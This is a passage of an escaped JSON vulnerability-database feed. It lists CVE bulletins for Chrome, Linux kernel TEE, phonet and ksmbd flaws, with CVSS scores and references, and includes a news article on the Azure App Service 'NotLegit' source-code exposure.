&quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;mscve&quot;, &quot;idList&quot;: [&quot;MS:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;archlinux&quot;, &quot;idList&quot;: [&quot;ASA-202112-6&quot;, &quot;ASA-202112-7&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12381&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;MICROSOFT_EDGE_CHROMIUM_96_0_1054_53.NASL&quot;, &quot;GOOGLE_CHROME_96_0_4664_93.NASL&quot;, &quot;OPENSUSE-2021-1582.NASL&quot;, &quot;FREEBSD_PKG_18AC074C579F11ECAAC73065EC8FD3EC.NASL&quot;, &quot;MACOSX_GOOGLE_CHROME_96_0_4664_93.NASL&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;18AC074C-579F-11EC-AAC7-3065EC8FD3EC&quot;]}, {&quot;type&quot;: &quot;chrome&quot;, &quot;idList&quot;: [&quot;GCSA-7014601772789068319&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:1582-1&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44&quot;]}], &quot;modified&quot;: &quot;2021-12-23T17:26:02&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.9, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T17:26:02&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;cpe&quot;: [], &quot;cpe23&quot;: [], &quot;cwe&quot;: [], &quot;affectedSoftware&quot;: [], &quot;affectedConfiguration&quot;: [], &quot;cpeConfiguration&quot;: {&quot;CVE_data_version&quot;: &quot;4.0&quot;, &quot;nodes&quot;: []}, &quot;extraReferences&quot;: [{&quot;url&quot;: &quot;https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html&quot;, &quot;name&quot;: &quot;https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}, {&quot;url&quot;: &quot;https://crbug.com/1267791&quot;, &quot;name&quot;: &quot;https://crbug.com/1267791&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}], &quot;_object_type&quot;: &quot;robots.models.cve.CveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.cve.CveBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}, {&quot;id&quot;: &quot;CVE-2021-44733&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;05b3d963987aa961c14afb1d0de3dcbb&quot;, &quot;type&quot;: &quot;cve&quot;, &quot;bulletinFamily&quot;: &quot;NVD&quot;, &quot;title&quot;: &quot;CVE-2021-44733&quot;, &quot;description&quot;: &quot;A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object.&quot;, &quot;published&quot;: &quot;2021-12-22T17:15:00&quot;, &quot;modified&quot;: &quot;2021-12-22T18:28:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44733&quot;, &quot;reporter&quot;: &quot;cve@mitre.org&quot;, &quot;references&quot;: [&quot;https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/tee/tee_shm.c&quot;, &quot;https://lore.kernel.org/lkml/20211215092501.1861229-1-jens.wiklander@linaro.org/&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-44733&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-22T19:26:00&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 4, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-44733&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-44733&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-44733&quot;]}], &quot;modified&quot;: &quot;2021-12-22T19:26:00&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.1, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T19:26:00&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;cpe&quot;: [], &quot;cpe23&quot;: [], &quot;cwe&quot;: [], &quot;affectedSoftware&quot;: [], &quot;affectedConfiguration&quot;: [], &quot;cpeConfiguration&quot;: {&quot;CVE_data_version&quot;: &quot;4.0&quot;, &quot;nodes&quot;: []}, &quot;extraReferences&quot;: [{&quot;url&quot;: &quot;https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/tee/tee_shm.c&quot;, &quot;name&quot;: &quot;https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/tee/tee_shm.c&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}, {&quot;url&quot;: &quot;https://lore.kernel.org/lkml/20211215092501.1861229-1-jens.wiklander@linaro.org/&quot;, &quot;name&quot;: &quot;https://lore.kernel.org/lkml/20211215092501.1861229-1-jens.wiklander@linaro.org/&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}], &quot;_object_type&quot;: &quot;robots.models.cve.CveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.cve.CveBulletin&quot;]}], &quot;redhatcve&quot;: [{&quot;id&quot;: &quot;RH:CVE-2021-45095&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;5bc1b2f59a00bdb5a3dad43f8f9b79eb&quot;, &quot;type&quot;: &quot;redhatcve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-45095&quot;, &quot;description&quot;: &quot;pep_sock_accept in net/phonet/pep.c in the Linux kernel through 5.15.8 has a refcount leak.\n&quot;, &quot;published&quot;: &quot;2021-12-23T17:21:30&quot;, &quot;modified&quot;: &quot;2021-12-23T18:51:09&quot;, &quot;cvss&quot;: {&quot;score&quot;: 2.1, &quot;vector&quot;: &quot;AV:L/AC:L/Au:N/C:P/I:N/A:N&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:L/AC:L/Au:N/C:P/I:N/A:N&quot;, &quot;accessVector&quot;: &quot;LOCAL&quot;, &quot;accessComplexity&quot;: &quot;LOW&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;NONE&quot;, &quot;baseScore&quot;: 2.1}, &quot;severity&quot;: &quot;LOW&quot;, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 2.9, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N&quot;, &quot;attackVector&quot;: &quot;LOCAL&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;LOW&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;UNCHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;NONE&quot;, &quot;baseScore&quot;: 5.5, &quot;baseSeverity&quot;: &quot;MEDIUM&quot;}, &quot;exploitabilityScore&quot;: 1.8, &quot;impactScore&quot;: 3.6}, &quot;href&quot;: &quot;https://access.redhat.com/security/cve/cve-2021-45095&quot;, &quot;reporter&quot;: &quot;redhat.com&quot;, &quot;references&quot;: [&quot;https://bugzilla.redhat.com/show_bug.cgi?id=2035338&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-45095&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T19:31:54&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 5, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45095&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45095&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-45095&quot;]}], &quot;modified&quot;: &quot;2021-12-23T19:31:54&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 5.0, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T19:31:54&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;vendorCvss&quot;: {&quot;score&quot;: &quot;5.5&quot;, &quot;vector&quot;: &quot;CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N&quot;}, &quot;_object_type&quot;: &quot;robots.models.redhatcve.RedhatCVEBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.redhatcve.RedhatCVEBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}, {&quot;id&quot;: &quot;RH:CVE-2021-45100&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;857285c663a404ddfb0ff8669e7054b8&quot;, &quot;type&quot;: &quot;redhatcve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-45100&quot;, &quot;description&quot;: &quot;The ksmbd server through 3.4.2, as used in the Linux kernel through 5.15.8, sometimes communicates in cleartext even though encryption has been enabled. This occurs because it sets the SMB2_GLOBAL_CAP_ENCRYPTION flag when using the SMB 3.1.1 protocol, which is a violation of the SMB protocol specification. When Windows 10 detects this protocol violation, it disables encryption.\n&quot;, &quot;published&quot;: &quot;2021-12-23T17:21:28&quot;, &quot;modified&quot;: &quot;2021-12-23T18:51:09&quot;, &quot;cvss&quot;: {&quot;score&quot;: 5.0, &quot;vector&quot;: &quot;AV:N/AC:L/Au:N/C:P/I:N/A:N&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:L/Au:N/C:P/I:N/A:N&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;LOW&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;NONE&quot;, &quot;baseScore&quot;: 5.0}, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;exploitabilityScore&quot;: 10.0, &quot;impactScore&quot;: 2.9, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;UNCHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;NONE&quot;, &quot;baseScore&quot;: 7.5, &quot;baseSeverity&quot;: &quot;HIGH&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 3.6}, &quot;href&quot;: &quot;https://access.redhat.com/security/cve/cve-2021-45100&quot;, &quot;reporter&quot;: &quot;redhat.com&quot;, &quot;references&quot;: [&quot;https://bugzilla.redhat.com/show_bug.cgi?id=2035345&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-45100&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T19:31:40&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 6, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-45100&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45100&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45100&quot;]}], &quot;modified&quot;: &quot;2021-12-23T19:31:40&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 4.0, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T19:31:40&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;vendorCvss&quot;: {&quot;score&quot;: &quot;7.5&quot;, &quot;vector&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N&quot;}, &quot;_object_type&quot;: &quot;robots.models.redhatcve.RedhatCVEBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.redhatcve.RedhatCVEBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}], &quot;thn&quot;: [{&quot;id&quot;: &quot;THN:B078A239291615ADE17044ED56E2347B&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;2807bfc64b8120ea2ca82d4aabf2041b&quot;, &quot;type&quot;: &quot;thn&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories&quot;, &quot;description&quot;: &quot;[![Azure App Service](https://thehackernews.com/new-images/img/a/AVvXsEikOnyMp6bayk5tSb6yCsFeUS5TNXzM3llU99-IFptUzuBCpRtHW2oJbjU4eIe7rsQVLqBzKNUlfcHuK83_D43P5ZTkwB_Y6f1iqTooO4V7nXTdBfaYwMQU5bGHl7qrwyt5juWAjbnLCTFkiwjvI5kTfLZy85IhaP3e23pn52tclowWOZdQWyuO86L-=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEikOnyMp6bayk5tSb6yCsFeUS5TNXzM3llU99-IFptUzuBCpRtHW2oJbjU4eIe7rsQVLqBzKNUlfcHuK83_D43P5ZTkwB_Y6f1iqTooO4V7nXTdBfaYwMQU5bGHl7qrwyt5juWAjbnLCTFkiwjvI5kTfLZy85IhaP3e23pn52tclowWOZdQWyuO86L-&gt;)\n\nA security flaw has been unearthed in Microsoft&#x27;s Azure App Service that resulted in the exposure of source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years since September 2017.\n\nThe vulnerability, codenamed \&quot;[NotLegit](&lt;https://www.wiz.io/blog/azure-app-service-source-code-leak&gt;),\&quot; was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations have been undertaken to fix the information disclosure bug in November. Microsoft [said](&lt;https://msrc-blog.microsoft.com/2021/12/22/azure-app-service-linux-source-repository-exposure/&gt;) a \&quot;limited subset of customers\&quot; are at risk, adding \&quot;Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers.\&quot;\n\n[![Automatic GitHub Backups]()](&lt;https://go.thn.li/backhub-dm3&gt; \&quot;Automatic GitHub Backups\&quot; )\n\nThe [Azure App Service](&lt;https://azure.microsoft.com/en-in/services/app-service/#overview&gt;) (aka Azure Web Apps) is a cloud computing-based platform for building and hosting web applications. It allows users to deploy source code and artifacts to the service using a local [Git](&lt;https://git-scm.com/book/en/v2/Getting-Started-What-is-Git%3F&gt;) repository, or via repositories hosted on GitHub and Bitbucket.\n\n[![Azure App Service](https://thehackernews.com/new-images/img/a/AVvXsEgMAfr7lMEX3wqVm-m59qodG-kHnf1kXnXQznKfIaoZprzBer12nVu6oczNofTXSo10kiClUH3ENzluKVtFO4zMJ4w8AYyUws71M5rQ1Xj3UwM_T9m4-WFSu37dS0S36Tt9HnC990rPinXkD_6HTixmtMKts_eHCMSPXM4LNpb5AfhOThhZpP8oRsib=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEgMAfr7lMEX3wqVm-m59qodG-kHnf1kXnXQznKfIaoZprzBer12nVu6oczNofTXSo10kiClUH3ENzluKVtFO4zMJ4w8AYyUws71M5rQ1Xj3UwM_T9m4-WFSu37dS0S36Tt9HnC990rPinXkD_6HTixmtMKts_eHCMSPXM4LNpb5AfhOThhZpP8oRsib&gt;)\n\nThe insecure default behavior occurs when the Local Git method is used to deploy to Azure App Service, resulting in a scenario where the Git repository is created within a publicly accessible directory (home/site/wwwroot).\n\nWhile Microsoft does add a \&quot;web.config\&quot; file to the [.git folder](&lt;https://git-scm.com/docs/gitrepository-layout&gt;) \u2014 which contains the state and history of the repository \u2014 to restrict public access, the configuration files are only used with C# or ASP.NET applications that rely on Microsoft&#x27;s own IIS web servers, leaving out apps coded in other programming languages like PHP, Ruby, Python, or Node that are deployed with different web servers like Apache, Nginx, and Flask.\n\n[![Prevent Data Breaches]()](&lt;https://go.thn.li/crowdsec-inside-2&gt; \&quot;Prevent Data Breaches\&quot; )\n\n\&quot;Basically, all a malicious actor had to do was to fetch the &#x27;/.git&#x27; directory from the target application, and retrieve its source code,\&quot; Wiz researcher Shir Tamari said. \&quot;Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks.\&quot;\n\n\&quot;Finding vulnerabilities in software is much easier when the source code is available,\&quot; Tamari added.\n\n  \n\n\nFound this article interesting? Follow THN on [Facebook](&lt;https://www.facebook.com/thehackernews&gt;), [Twitter _\uf099_](&lt;https://twitter.com/thehackersnews&gt;) and [LinkedIn](&lt;https://www.linkedin.com/company/thehackernews/&gt;) to read more exclusive content we post.\n&quot;, &quot;published&quot;: &quot;2021-12-23T07:51:00&quot;, &quot;modified&quot;: &quot;2021-12-23T10:00:53&quot;, &quot;cvss&quot;: {&quot;score&quot;: 5.1, &quot;vector&quot;: &quot;AV:N/AC:H/Au:N/C:P/I:P/A:P&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:H/Au:N/C:P/I:P/A:P&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;HIGH&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;PARTIAL&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 5.1}, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;exploitabilityScore&quot;: 4.9, &quot;impactScore&quot;: 6.4, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;HIGH&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 9.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 2.2, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://thehackernews.com/2021/12/4-year-old-bug-in-azure-app-service.html&quot;, &quot;reporter&quot;: &quot;The Hacker News&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-45046&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T10:42:43&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;THN:B078A239291615ADE17044ED56E2347B&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;8c10ba2f35a5e99366754f0c47e8feaf&quot;, &quot;type&quot;: &quot;thn&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories&quot;, &quot;description&quot;: &quot;[![Azure App Service](https://thehackernews.com/new-images/img/a/AVvXsEikOnyMp6bayk5tSb6yCsFeUS5TNXzM3llU99-IFptUzuBCpRtHW2oJbjU4eIe7rsQVLqBzKNUlfcHuK83_D43P5ZTkwB_Y6f1iqTooO4V7nXTdBfaYwMQU5bGHl7qrwyt5juWAjbnLCTFkiwjvI5kTfLZy85IhaP3e23pn52tclowWOZdQWyuO86L-=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEikOnyMp6bayk5tSb6yCsFeUS5TNXzM3llU99-IFptUzuBCpRtHW2oJbjU4eIe7rsQVLqBzKNUlfcHuK83_D43P5ZTkwB_Y6f1iqTooO4V7nXTdBfaYwMQU5bGHl7qrwyt5juWAjbnLCTFkiwjvI5kTfLZy85IhaP3e23pn52tclowWOZdQWyuO86L-&gt;)\n\nA security flaw has been unearthed in Microsoft&#x27;s Azure App Service that resulted in the exposure of source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years since September 2017.\n\nThe vulnerability, codenamed \&quot;[NotLegit](&lt;https://www.wiz.io/blog/azure-app-service-source-code-leak&gt;),\&quot; was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations have been undertaken to fix the information disclosure bug in November. Microsoft [said](&lt;https://msrc-blog.microsoft.com/2021/12/22/azure-app-service-linux-source-repository-exposure/&gt;) a \&quot;limited subset of customers,\&quot; adding \&quot;Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers.\&quot;\n\n[![Automatic GitHub Backups]()](&lt;https://go.thn.li/backhub-dm2&gt; \&quot;Automatic GitHub Backups\&quot; )\n\nThe [Azure App Service](&lt;https://azure.microsoft.com/en-in/services/app-service/#overview&gt;) (aka Azure Web Apps) is a cloud computing-based platform for building and hosting web applications. It allows users to deploy source code and artifacts to the service using a local [Git](&lt;https://git-scm.com/book/en/v2/Getting-Started-What-is-Git%3F&gt;) repository, or via repositories hosted on GitHub and Bitbucket.\n\n[![Azure App Service](https://thehackernews.com/new-images/img/a/AVvXsEgMAfr7lMEX3wqVm-m59qodG-kHnf1kXnXQznKfIaoZprzBer12nVu6oczNofTXSo10kiClUH3ENzluKVtFO4zMJ4w8AYyUws71M5rQ1Xj3UwM_T9m4-WFSu37dS0S36Tt9HnC990rPinXkD_6HTixmtMKts_eHCMSPXM4LNpb5AfhOThhZpP8oRsib=s728-e1000)](&lt;https://thehackernews.com/new-images/img/a/AVvXsEgMAfr7lMEX3wqVm-m59qodG-kHnf1kXnXQznKfIaoZprzBer12nVu6oczNofTXSo10kiClUH3ENzluKVtFO4zMJ4w8AYyUws71M5rQ1Xj3UwM_T9m4-WFSu37dS0S36Tt9HnC990rPinXkD_6HTixmtMKts_eHCMSPXM4LNpb5AfhOThhZpP8oRsib&gt;)\n\nThe insecure default behavior occurs when the Local Git method is used to deploy to Azure App Service, resulting in a scenario where the Git repository is created within a publicly accessible directory (home/site/wwwroot).\n\nWhile Microsoft does add a \&quot;web.config\&quot; file to the [.git folder](&lt;https://git-scm.com/docs/gitrepository-layout&gt;) \u2014 which contains the state and history of the repository \u2014 to restrict public access, the configuration files are only used with C# or ASP.NET applications that rely on Microsoft&#x27;s own IIS web servers, leaving out apps coded in other programming languages like PHP, Ruby, Python, or Node that are deployed with different web servers like Apache, Nginx, and Flask.\n\n[![Prevent Data Breaches]()](&lt;https://go.thn.li/crowdsec-inside-2&gt; \&quot;Prevent Data Breaches\&quot; )\n\n\&quot;Basically, all a malicious actor had to do was to fetch the &#x27;/.git&#x27; directory from the target application, and retrieve its source code,\&quot; Wiz researcher Shir Tamari said. \&quot;Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks.\&quot;\n\n\&quot;Finding vulnerabilities in software is much easier when the source code is available,\&quot; Tamari added.\n\n  \n\n\nFound this article interesting? Follow THN on [Facebook](&lt;https://www.facebook.com/thehackernews&gt;), [Twitter _\uf099_](&lt;https://twitter.com/thehackersnews&gt;) and [LinkedIn](&lt;https://www.linkedin.com/company/thehackernews/&gt;) to read more exclusive content we post.\n&quot;, &quot;published&quot;: &quot;2021-12-23T07:51:00&quot;, &quot;modified&quot;: &quot;2021-12-23T07:51:17&quot;, &quot;cvss&quot;: {&quot;score&quot;: 5.1, &quot;vector&quot;: &quot;AV:N/AC:H/Au:N/C:P/I:P/A:P&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:H/Au:N/C:P/I:P/A:P&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;HIGH&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;PARTIAL&quot;, &quot;integrityImpact&quot;: &quot;PARTIAL&quot;, &quot;availabilityImpact&quot;: &quot;PARTIAL&quot;, &quot;baseScore&quot;: 5.1}, &quot;severity&quot;: &quot;MEDIUM&quot;, &quot;exploitabilityScore&quot;: 4.9, &quot;impactScore&quot;: 6.4, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;HIGH&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 9.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 2.2, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://thehackernews.com/2021/12/4-year-old-bug-in-azure-app-service.html&quot;, &quot;reporter&quot;: &quot;The Hacker News&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-45046&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T08:37:38&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 6, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;}, &quot;lastseen&quot;: &quot;2021-12-23T08:37:38&quot;, &quot;differentElements&quot;: [&quot;description&quot;, &quot;modified&quot;], &quot;edition&quot;: 1}], &quot;viewCount&quot;: 12, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: 